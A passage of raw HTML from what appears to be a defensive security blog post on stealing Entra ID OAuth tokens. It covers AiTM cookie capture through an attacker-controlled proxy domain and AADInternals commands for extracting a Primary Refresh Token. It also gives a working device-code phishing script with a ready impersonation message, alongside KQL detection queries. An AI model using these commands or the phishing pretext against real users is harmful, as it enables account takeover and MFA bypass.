It contains the user's identity claims, group memberships, and the application it was issued for.</li>\n<li class=\"\"><strong>Refresh Token</strong> - a longer-lived credential (up to 90 days for persistent browser sessions) that allows obtaining new access tokens without re-authenticating.</li>\n<li class=\"\"><strong>Primary Refresh Token (PRT)</strong> - a device-bound, highly privileged token issued to Entra ID-joined machines. It can generate tokens for any application the user has access to.</li>\n</ul>\n<p>If an attacker obtains a refresh token or PRT, they have persistent access to your environment that survives password resets.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-access-tokens-are-stolen\">How Access Tokens Are Stolen<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#how-access-tokens-are-stolen\" class=\"hash-link\" aria-label=\"Direct link to How Access Tokens Are Stolen\" title=\"Direct link to How Access Tokens Are Stolen\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"browser-theft-via-malicious-extensions-or-xss\">Browser Theft via Malicious Extensions or XSS<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#browser-theft-via-malicious-extensions-or-xss\" class=\"hash-link\" aria-label=\"Direct link to Browser Theft via Malicious Extensions or XSS\" title=\"Direct link to Browser Theft via Malicious Extensions or XSS\" translate=\"no\">​</a></h4>\n<p>The most common path. When a user authenticates to Microsoft 365 through a browser, tokens are stored in the browser's IndexedDB or session storage. A malicious Chrome extension with storage permissions can enumerate and exfiltrate all of them silently.</p>\n<p>The attacker doesn't need to crack anything. 
The token is valid, signed by Microsoft, and completely legitimate.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"adversary-in-the-middle-aitm-phishing\">Adversary-in-the-Middle (AiTM) Phishing<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#adversary-in-the-middle-aitm-phishing\" class=\"hash-link\" aria-label=\"Direct link to Adversary-in-the-Middle (AiTM) Phishing\" title=\"Direct link to Adversary-in-the-Middle (AiTM) Phishing\" translate=\"no\">​</a></h4>\n<p>Tools like Evilginx2 and Muraena act as reverse proxies between the victim and the legitimate Microsoft login page. The victim sees the real Microsoft login UI, completes MFA, and the proxy captures the post-authentication session cookie.</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Evilginx2 phishlet targeting Microsoft 365 (simplified flow)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Attacker hosts reverse proxy at attacker-controlled domain</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" 
style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Victim visits: login.attacker-domain.com</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Proxy forwards to: login.microsoftonline.com</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Victim authenticates, completes MFA</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Evilginx captures the session cookie (estsauth, estsauthpersistent)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Attacker imports cookie:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 1. Opens Chrome DevTools</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 2. 
Imports captured cookie into browser storage</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 3. Visits portal.office.com - authenticated as victim, no MFA prompted</span><br></span></code></pre></div></div>\n<p>This is why MFA alone is not sufficient protection. The attacker is not bypassing MFA - they're stealing the result of a completed MFA flow.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"prt-theft-from-entra-id-joined-devices\">PRT Theft from Entra ID-Joined Devices<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#prt-theft-from-entra-id-joined-devices\" class=\"hash-link\" aria-label=\"Direct link to PRT Theft from Entra ID-Joined Devices\" title=\"Direct link to PRT Theft from Entra ID-Joined Devices\" translate=\"no\">​</a></h4>\n<p>The Primary Refresh Token lives in the Windows LSASS process on domain-joined machines. 
An attacker with local admin can use tools like ROADtoken or AADInternals to extract and use it.</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Using AADInternals to extract PRT from a joined device (requires local admin)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Import-Module AADInternals</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Extract PRT and session key from LSASS</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$prt = Get-AADIntUserPRTToken</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Use PRT to generate a new access token for any resource</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$token = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prt</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># From here, the attacker can access any 
Microsoft resource</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># the user is authorized for - SharePoint, Exchange, Teams, Azure</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-to-look-for-in-logs\">What to Look For in Logs<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#what-to-look-for-in-logs\" class=\"hash-link\" aria-label=\"Direct link to What to Look For in Logs\" title=\"Direct link to What to Look For in Logs\" translate=\"no\">​</a></h3>\n<p>When token theft is occurring, the legitimate user's sign-in logs will show successful authentication from their normal location, while the attacker's usage will appear as API calls or browser sessions from unusual IPs - but importantly, they will show as successful with no failed authentications.</p>\n<p>Key signals in Entra ID Sign-in Logs (<code>AADNonInteractiveUserSignInLogs</code>):</p>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Detect token replay from anomalous IP</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AADNonInteractiveUserSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where ResultType == 0  // successful</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| summarize </span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    IPs = make_set(IPAddress),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Locations = make_set(Location),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    FirstSeen = min(TimeGenerated),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    LastSeen = max(TimeGenerated)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    by UserPrincipalName, CorrelationId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where array_length(IPs) &gt; 2</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where array_length(Locations) &gt; 1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project UserPrincipalName, IPs, Locations, FirstSeen, LastSeen</span><br></span></code></pre></div></div>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Impossible travel detection (token used from two geographies within 1 hour)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AADNonInteractiveUserSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 
| where ResultType">
plain\">| where ResultType == 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, UserPrincipalName, IPAddress, Location</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by UserPrincipalName, TimeGenerated asc</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend PrevTime = prev(TimeGenerated), PrevLocation = prev(Location), PrevUser = prev(UserPrincipalName)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where UserPrincipalName == PrevUser</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend MinutesDelta = datetime_diff('minute', TimeGenerated, PrevTime)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where MinutesDelta &lt; 60 and Location != PrevLocation</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-2-device-code-phishing--the-attack-that-bypasses-every-mfa-control\">Section 2: Device Code Phishing - The Attack That Bypasses Every MFA Control<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#section-2-device-code-phishing--the-attack-that-bypasses-every-mfa-control\" class=\"hash-link\" aria-label=\"Direct link to Section 2: Device Code Phishing - The Attack That Bypasses Every MFA Control\" title=\"Direct link to Section 2: Device Code Phishing - The Attack That Bypasses Every MFA Control\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-this-attack-is-devastatingly-effective\">Why This Attack Is Devastatingly Effective<a 
href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#why-this-attack-is-devastatingly-effective\" class=\"hash-link\" aria-label=\"Direct link to Why This Attack Is Devastatingly Effective\" title=\"Direct link to Why This Attack Is Devastatingly Effective\" translate=\"no\">​</a></h3>\n<p>Device code phishing is arguably the most dangerous technique in this category because it:</p>\n<ul>\n<li class=\"\">Requires zero malware on the victim's machine</li>\n<li class=\"\">Completely bypasses MFA (the user completes it themselves)</li>\n<li class=\"\">Produces a fully legitimate refresh token indistinguishable from a normal login</li>\n<li class=\"\">Can be executed entirely through email or Teams messages</li>\n<li class=\"\">Works against even hardware token MFA (FIDO2 keys do <strong>NOT</strong> protect against this)</li>\n</ul>\n<p>Understanding why requires understanding the OAuth 2.0 Device Authorization Grant flow  which was designed for devices without browsers (smart TVs, IoT devices) and has been weaponized against enterprise users.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-legitimate-flow-so-you-understand-whats-being-abused\">The Legitimate Flow (So You Understand What's Being Abused)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#the-legitimate-flow-so-you-understand-whats-being-abused\" class=\"hash-link\" aria-label=\"Direct link to The Legitimate Flow (So You Understand What's Being Abused)\" title=\"Direct link to The Legitimate Flow (So You Understand What's Being Abused)\" translate=\"no\">​</a></h3>\n<p>The Device Authorization Grant (<code>urn:ietf:params:oauth:grant-type:device_code</code>) works like this:</p>\n<ol>\n<li class=\"\">A device that cannot show a browser calls the authorization endpoint and receives a <code>device_code</code> and a <code>user_code</code></li>\n<li class=\"\">The device 
displays: \"Go to microsoft.com/devicelogin and enter code: ABCD-EFGH\"</li>\n<li class=\"\">The user opens a browser, navigates to that URL, enters the code, confirms the name of the app that requested it, and completes authentication including MFA; the server marks the pending <code>device_code</code> as approved</li>\n<li class=\"\">The device polls the token endpoint with the <code>device_code</code>, receiving <code>authorization_pending</code> until the approval lands, then the access token and refresh token</li>\n</ol>\n<p>The design intention is that the device initiates the request and the user approves it elsewhere. The attack inverts this: the attacker initiates the request and tricks the user into approving it. Nothing in the flow ties the browser session that enters the <code>user_code</code> to the client that requested it, so whoever holds the <code>device_code</code> receives the tokens. The only thing the user learns about the requester is the app name shown on the login page, which is one reason the attack borrows a Microsoft first-party client ID.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-attack-flow-step-by-step\">The Attack Flow, Step by Step<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#the-attack-flow-step-by-step\" class=\"hash-link\" aria-label=\"Direct link to The Attack Flow, Step by Step\" title=\"Direct link to The Attack Flow, Step by Step\" translate=\"no\">​</a></h3>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Step 1: Attacker initiates device code request</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># (this is a standard OAuth request, no exploit required)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" 
style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> requests</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">tenant_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"common\"</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># or target tenant ID</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">client_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"d3590ed6-52b3-4102-aeff-aad2292ab01c\"</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Microsoft Office client ID (legitimate)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Request device code</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">response </span><span class=\"token operator\" 
style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">post</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"https://login.microsoftonline.com/</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">tenant_id</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">/oauth2/v2.0/devicecode\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    data</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"client_id\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> client_id</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 
32%)\">\"scope\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"openid profile email offline_access https://graph.microsoft.com/.default\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">device_code_data </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> response</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">user_code </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> device_code_data</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"user_code\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">       </span><span class=\"token 
comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># e.g., \"ABCD-EFGH\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">device_code </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> device_code_data</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"device_code\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">   </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># long opaque string</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">verification_uri </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> device_code_data</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"verification_uri\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># microsoft.com/devicelogin</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"Send victim to: </span><span 
class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">verification_uri</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"Tell them to enter code: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">user_code</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Step 2: Attacker sends phishing message to victim</span><span 
class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Example Teams message (seen in real Midnight Blizzard campaigns):</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># \"Hi, IT Security here. We're rolling out a new MFA compliance check.</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#  Please go to microsoft.com/devicelogin and enter this code to verify</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#  your device: ABCD-EFGH</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#  This takes 2 minutes and must be completed by EOD.\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># The victim trusts this because:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># - The URL is a real Microsoft URL</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># - The flow looks exactly like legitimate device enrollment</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># - They've likely done this before for real IT requests</span><br></span></code></pre></div></div>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Step 3: Attacker polls for token while victim completes authentication</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> time</span><br></span><span class=\"token-line\" 
